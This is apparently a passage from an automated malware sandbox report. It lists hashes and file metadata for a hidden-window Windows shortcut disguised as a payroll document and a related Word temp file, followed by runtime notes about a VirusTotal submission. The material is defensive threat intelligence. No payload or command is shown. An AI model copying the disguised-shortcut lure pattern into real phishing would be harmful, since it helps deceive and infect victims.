  - SHA1: 97ef035ed407cd69a19d749dd58d8cbc73dcda5c
  - SHA256: 6051e171b7617fc5e1cb68bcff6b5a2681ed039120209907cf9c947f9b5c08ec
- 09172%20Payroll%20Summary.doc.lnk
  - Size: 594B (594 bytes)
  - Type: lnk
  - Description: MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Archive, ctime=Thu May 17 20:52:27 2018, mtime=Thu May 17 20:52:27 2018, atime=Thu May 17 20:52:42 2018, length=167424, window=hide
  - MD5: bf579ab8e8675febda19a41a128a8d0a
  - SHA1: 97f6969780b8d5cc608b4a56ae7328d0f6a11c9d
  - SHA256: 1f3ebc3cda7497e3df71182a5e07214863d88c8a7cbbf01d7246692dbcbde717
- ~WRD0003.tmp
  - Size: 44KiB (45056 bytes)
  - Type: doc office
  - Description: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Ryfewujashowavae46504, Subject: Ryfewujasho58022, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu May 17 19:45:00 2018, Last Saved Time/Date: Thu May 17 23:07:00 2018, Number of Pages: 1, Number of Words: 1, Number of Characters: 7, Security: 0
  - MD5: a62259ab4dfb5ac263d60e550581f015
  - SHA1: e3aa842383e704aeeb2bbe95d0294ca7838ddc8b
  - SHA256: 46f66f061d1c6eb59c09c2e5b5e0afba7a44dd54c1ddfff51ab9f3863fe9ea8a
Notifications
Runtime
- Added comment to Virus Total report
- Extracted file "~$172 Payroll Summary.doc" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/6051e171b7617fc5e1cb68bcff6b5a2681ed039120209907cf9c947f9b5c08ec/analysis/1526565676/")
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "api-70" are available in the report
- Not all sources for indicator ID "hooks-8" are available in the report
- Not all sources for indicator ID "mutant-0" are available in the report